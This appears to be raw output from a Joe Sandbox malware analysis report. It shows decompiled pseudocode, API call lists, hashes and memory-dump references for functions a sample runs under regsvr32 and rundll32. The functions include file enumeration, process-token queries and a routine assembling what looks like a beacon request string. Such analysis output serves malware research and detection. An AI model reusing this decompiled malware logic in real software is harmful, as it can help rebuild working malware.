                                                  • Instruction ID: 5716b4f9dd1fc50b22b69a48d9bcb95433d038eeb79409aee8b7dbcd502d9279
                                                  • Opcode Fuzzy Hash: f11f268c371622f90b8d6c2830d67cb25210aa85c0282334d9ef30495bcdacf1
                                                  • Instruction Fuzzy Hash: 8DF03C76900118BBCB11EFA8CC85CDF7BACEE083587114062B908D7111E771EA14ABA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C83CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(010A87FA,00000000,00000000,74ECC740,00C8A453,00000000), ref: 00C83CD8
                                                  • lstrlen.KERNEL32(?), ref: 00C83CE0
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • lstrcpy.KERNEL32(00000000,010A87FA), ref: 00C83CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00C83CFF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 79e8090fc0b7ff85b700b753d4d84c0313762b77a763adfc142bf5448e342924
                                                  • Instruction ID: c36620b9ab478f9f2f75681aa1d07aa5a280df927b23ce2b9d61852be5fe6050
                                                  • Opcode Fuzzy Hash: 79e8090fc0b7ff85b700b753d4d84c0313762b77a763adfc142bf5448e342924
                                                  • Instruction Fuzzy Hash: 80E06D33501224A78711ABE5AC88E6FBBADEE89A657044416F600D3120C7348D009BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: rundll32.exe PID: 6420 Parent PID: 1132 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 04B312D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E04B312D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x4b3d278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x4b3d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x4b3d278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x4b3d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x4b3d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x4b3d278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x4b3d27c; // 0x1fba5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x4b3e7f2; // 0x73797325
				_t83 = E04B395B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x4b3d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x4b3d27c; // 0x1fba5a8
				_t16 = _t93 + 0x4b3e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                  0x04b312dd
                                                  0x04b312e3
                                                  0x04b312e5
                                                  0x04b312ff
                                                  0x04b31303
                                                  0x04b31306
                                                  0x04b3157b
                                                  0x04b31582
                                                  0x04b31582
                                                  0x04b3130c
                                                  0x04b31321
                                                  0x04b31323
                                                  0x04b31327
                                                  0x04b3132a
                                                  0x04b3156b
                                                  0x04b31575
                                                  0x00000000
                                                  0x04b31575
                                                  0x04b31330
                                                  0x04b3133b
                                                  0x04b31340
                                                  0x04b31345
                                                  0x04b31348
                                                  0x04b3134f
                                                  0x04b31356
                                                  0x04b31359
                                                  0x04b3155b
                                                  0x04b31565
                                                  0x00000000
                                                  0x04b31565
                                                  0x04b3136f
                                                  0x04b31373
                                                  0x04b31376
                                                  0x04b31379
                                                  0x04b31381
                                                  0x04b31384
                                                  0x04b3138d
                                                  0x04b31393
                                                  0x04b3139d
                                                  0x04b313a4
                                                  0x04b313a4
                                                  0x04b313b6
                                                  0x04b313c1
                                                  0x04b313cf
                                                  0x04b313d4
                                                  0x04b313d9
                                                  0x04b313dc
                                                  0x04b313e1
                                                  0x04b313eb
                                                  0x04b313ee
                                                  0x04b313f1
                                                  0x04b31407
                                                  0x04b3140b
                                                  0x04b3140e
                                                  0x04b31559
                                                  0x00000000
                                                  0x04b31559
                                                  0x04b31425
                                                  0x04b31476
                                                  0x04b31439
                                                  0x04b31441
                                                  0x04b31446
                                                  0x04b31454
                                                  0x04b3145d
                                                  0x04b31466
                                                  0x04b31466
                                                  0x04b31474
                                                  0x04b31474
                                                  0x04b3147a
                                                  0x04b3147e
                                                  0x04b3147e
                                                  0x04b31484
                                                  0x00000000
                                                  0x00000000
                                                  0x04b31486
                                                  0x04b3148c
                                                  0x04b31533
                                                  0x04b31536
                                                  0x04b31543
                                                  0x04b31543
                                                  0x04b31547
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3153c
                                                  0x04b31540
                                                  0x04b31540
                                                  0x04b31542
                                                  0x04b31542
                                                  0x04b3154c
                                                  0x04b31553
                                                  0x04b31555
                                                  0x00000000
                                                  0x04b31555
                                                  0x04b31492
                                                  0x04b31494
                                                  0x04b31494
                                                  0x04b314a7
                                                  0x04b314ad
                                                  0x04b314b8
                                                  0x04b314ba
                                                  0x04b314be
                                                  0x04b314c0
                                                  0x04b314c0
                                                  0x04b314c5
                                                  0x04b314c7
                                                  0x04b314c7
                                                  0x04b314c5
                                                  0x04b314cc
                                                  0x04b314d0
                                                  0x04b314d0
                                                  0x04b314e0
                                                  0x04b314e5
                                                  0x04b314e8
                                                  0x04b314e8
                                                  0x04b314eb
                                                  0x04b314f5
                                                  0x04b314fd
                                                  0x04b31502
                                                  0x04b31510
                                                  0x04b31510
                                                  0x04b31524
                                                  0x04b31528
                                                  0x04b31528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04B312FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04B31321
                                                  • memset.NTDLL ref: 04B3133B
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04B323E9,63699BCE,04B31354,73797325), ref: 04B395C2
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04B395DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04B31379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04B3138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04B313A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04B313B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 04B313F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 04B31407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04B31425
                                                  • FindNextFileA.KERNELBASE(04B396C1,?), ref: 04B31439
                                                  • FindClose.KERNEL32(04B396C1), ref: 04B31446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04B31452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04B31474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 04B314A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 04B314E0
                                                  • FindNextFileA.KERNELBASE(04B396C1,?), ref: 04B314F5
                                                  • FindClose.KERNEL32(04B396C1), ref: 04B31502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04B3150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04B3151E
                                                  • FindClose.KERNELBASE(04B396C1), ref: 04B31553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04B31565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B31575
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 38e0bbf477ae2a221c9a085c0dffc5490228d4ac274addf3f75173e2da0ee898
                                                  • Instruction ID: 6821e6e4fa31c173d68673657d9a7e322696b7529853cf6d76cc2d487c34e0a2
                                                  • Opcode Fuzzy Hash: 38e0bbf477ae2a221c9a085c0dffc5490228d4ac274addf3f75173e2da0ee898
                                                  • Instruction Fuzzy Hash: 6C8128B2900119AFDF11CFAADC84AEEBBBDEB48302F1145A6E505E7250D734AA448F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B383B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E04B383B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04B32049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04B39039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                  0x04b383c4
                                                  0x04b383c5
                                                  0x04b383c6
                                                  0x04b383c7
                                                  0x04b383c8
                                                  0x04b383cc
                                                  0x04b383d3
                                                  0x04b383e2
                                                  0x04b383e5
                                                  0x04b383e8
                                                  0x04b383ef
                                                  0x04b383f2
                                                  0x04b383f5
                                                  0x04b383f8
                                                  0x04b383fb
                                                  0x04b38406
                                                  0x04b38408
                                                  0x04b38411
                                                  0x04b38419
                                                  0x04b3841b
                                                  0x04b3842d
                                                  0x04b38437
                                                  0x04b3843b
                                                  0x04b3844a
                                                  0x04b3844e
                                                  0x04b38457
                                                  0x04b3845f
                                                  0x04b3845f
                                                  0x04b38461
                                                  0x04b38461
                                                  0x04b38469
                                                  0x04b3846f
                                                  0x04b38473
                                                  0x04b38473
                                                  0x04b3847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04B383FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04B38411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B3842D
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B3844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04B38457
                                                  • NtClose.NTDLL(?), ref: 04B38469
                                                  • NtClose.NTDLL(00000000), ref: 04B38473
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 78090a27904e85b0902e6e4d2eb6af77471f46e10dae65ad7b64590d7bfb7f53
                                                  • Instruction ID: 10f9044af3db6665a4f6cb26300f73fc68bfcf113f42345dfe411f5fdd0e589d
                                                  • Opcode Fuzzy Hash: 78090a27904e85b0902e6e4d2eb6af77471f46e10dae65ad7b64590d7bfb7f53
                                                  • Instruction Fuzzy Hash: CE21E9B6900128BBDB11AF96CC45ADEBFBDEF08751F104066F604B6110D7759A549BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B38B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04B38B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x4b3d018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0x4b3d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x4b3d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x4b3d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x4b3d27c; // 0x1fba5a8
				_t3 = _t64 + 0x4b3e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4b3d02c,  *0x4b3d004, _t59);
				_t67 = E04B31C1A();
				_t68 =  *0x4b3d27c; // 0x1fba5a8
				_t4 = _t68 + 0x4b3e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E04B354BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x4b3d27c; // 0x1fba5a8
					_t7 = _t127 + 0x4b3e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x4b3d238, 0, _v8);
				}
				_t73 = E04B37649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x4b3d27c; // 0x1fba5a8
					_t11 = _t122 + 0x4b3e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x4b3d238, 0, _v8);
				}
				_t147 =  *0x4b3d32c; // 0x6af95b0
				_t75 = E04B39395(0x4b3d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x4b3d238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x4b3d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x4b3d238, _t153, _v20);
						goto L26;
					}
					E04B37A80(GetTickCount());
					_t82 =  *0x4b3d32c; // 0x6af95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x4b3d32c; // 0x6af95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x4b3d32c; // 0x6af95b0
					_t149 = E04B38307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x4b3d238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x4b3c2ac);
					_push(_t149);
					_t94 = E04B33CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x4b3d238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E04B3809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E04B3A1B0();
						L22:
						HeapFree( *0x4b3d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E04B343DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E04B3163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E04B39039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E04B385DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04B39039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                  0x04b38b94
                                                  0x04b38b94
                                                  0x04b38b94
                                                  0x04b38b9f
                                                  0x04b38ba6
                                                  0x04b38ba8
                                                  0x04b38ba8
                                                  0x04b38bb5
                                                  0x04b38bc0
                                                  0x04b38bc3
                                                  0x04b38bc8
                                                  0x04b38bd1
                                                  0x04b38bd4
                                                  0x04b38bd9
                                                  0x04b38bdc
                                                  0x04b38be1
                                                  0x04b38be4
                                                  0x04b38bf0
                                                  0x04b38bfd
                                                  0x04b38bff
                                                  0x04b38c05
                                                  0x04b38c0a
                                                  0x04b38c15
                                                  0x04b38c17
                                                  0x04b38c1a
                                                  0x04b38c1c
                                                  0x04b38c23
                                                  0x04b38c29
                                                  0x04b38c2c
                                                  0x04b38c2f
                                                  0x04b38c34
                                                  0x04b38c41
                                                  0x04b38c43
                                                  0x04b38c49
                                                  0x04b38c53
                                                  0x04b38c53
                                                  0x04b38c55
                                                  0x04b38c5c
                                                  0x04b38c5f
                                                  0x04b38c62
                                                  0x04b38c67
                                                  0x04b38c74
                                                  0x04b38c76
                                                  0x04b38c84
                                                  0x04b38c84
                                                  0x04b38c86
                                                  0x04b38c94
                                                  0x04b38c99
                                                  0x04b38c9d
                                                  0x04b38ca0
                                                  0x04b38e63
                                                  0x04b38e6d
                                                  0x04b38e76
                                                  0x04b38ca6
                                                  0x04b38cb2
                                                  0x04b38cba
                                                  0x04b38cbd
                                                  0x04b38e57
                                                  0x04b38e61
                                                  0x00000000
                                                  0x04b38e61
                                                  0x04b38cc9
                                                  0x04b38cce
                                                  0x04b38cd7
                                                  0x04b38ce8
                                                  0x04b38cec
                                                  0x04b38cf5
                                                  0x04b38cfb
                                                  0x04b38d0a
                                                  0x04b38d11
                                                  0x04b38d1a
                                                  0x04b38d20
                                                  0x04b38e4b
                                                  0x04b38e55
                                                  0x00000000
                                                  0x04b38e55
                                                  0x04b38d2c
                                                  0x04b38d32
                                                  0x04b38d33
                                                  0x04b38d3a
                                                  0x04b38d3d
                                                  0x04b38e41
                                                  0x04b38e49
                                                  0x00000000
                                                  0x04b38e49
                                                  0x04b38d46
                                                  0x04b38d4d
                                                  0x04b38d55
                                                  0x04b38d5a
                                                  0x04b38d63
                                                  0x04b38d69
                                                  0x04b38d70
                                                  0x04b38d77
                                                  0x04b38d7a
                                                  0x04b38e79
                                                  0x04b38e2d
                                                  0x04b38e2d
                                                  0x04b38e32
                                                  0x04b38e3d
                                                  0x04b38e3f
                                                  0x00000000
                                                  0x04b38e3f
                                                  0x04b38d84
                                                  0x04b38d8b
                                                  0x04b38d8e
                                                  0x04b38d93
                                                  0x04b38d9e
                                                  0x04b38da3
                                                  0x04b38da6
                                                  0x04b38dac
                                                  0x04b38db2
                                                  0x04b38db8
                                                  0x04b38dbb
                                                  0x04b38dc1
                                                  0x04b38dc4
                                                  0x04b38dc9
                                                  0x04b38dcd
                                                  0x04b38dcd
                                                  0x04b38dd9
                                                  0x04b38de5
                                                  0x04b38de9
                                                  0x04b38deb
                                                  0x04b38df0
                                                  0x04b38df2
                                                  0x04b38df7
                                                  0x04b38dfc
                                                  0x04b38e09
                                                  0x04b38e11
                                                  0x04b38e14
                                                  0x04b38e14
                                                  0x04b38df0
                                                  0x00000000
                                                  0x04b38ddb
                                                  0x04b38ddf
                                                  0x04b38e16
                                                  0x04b38e19
                                                  0x04b38e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b38e22
                                                  0x04b38de1
                                                  0x00000000
                                                  0x04b38de1
                                                  0x04b38dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04B38BA8
                                                  • wsprintfA.USER32 ref: 04B38BF8
                                                  • wsprintfA.USER32 ref: 04B38C15
                                                  • wsprintfA.USER32 ref: 04B38C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38C53
                                                  • wsprintfA.USER32 ref: 04B38C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B38CB2
                                                  • GetTickCount.KERNEL32 ref: 04B38CC3
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B38CD7
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B38CF5
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?,06AF95B0), ref: 04B38332
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(?,?,?,04B3A428,?,06AF95B0), ref: 04B3833A
                                                    • Part of subcall function 04B38307: strcpy.NTDLL ref: 04B38351
                                                    • Part of subcall function 04B38307: lstrcat.KERNEL32(00000000,?), ref: 04B3835C
                                                    • Part of subcall function 04B38307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B38379
                                                  • StrTrimA.SHLWAPI(00000000,04B3C2AC,?,06AF95B0), ref: 04B38D2C
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(06AF87FA,00000000,00000000,74ECC740,04B3A453,00000000), ref: 04B33CD8
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(?), ref: 04B33CE0
                                                    • Part of subcall function 04B33CC8: lstrcpy.KERNEL32(00000000,06AF87FA), ref: 04B33CF4
                                                    • Part of subcall function 04B33CC8: lstrcat.KERNEL32(00000000,?), ref: 04B33CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04B38D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 04B38D55
                                                  • lstrcat.KERNEL32(?,?), ref: 04B38D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 04B38D69
                                                    • Part of subcall function 04B3809F: lstrlen.KERNEL32(?,00000000,04B3D330,00000001,04B32200,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9), ref: 04B380A8
                                                    • Part of subcall function 04B3809F: mbstowcs.NTDLL ref: 04B380CF
                                                    • Part of subcall function 04B3809F: memset.NTDLL ref: 04B380E1
                                                  • wcstombs.NTDLL ref: 04B38DFC
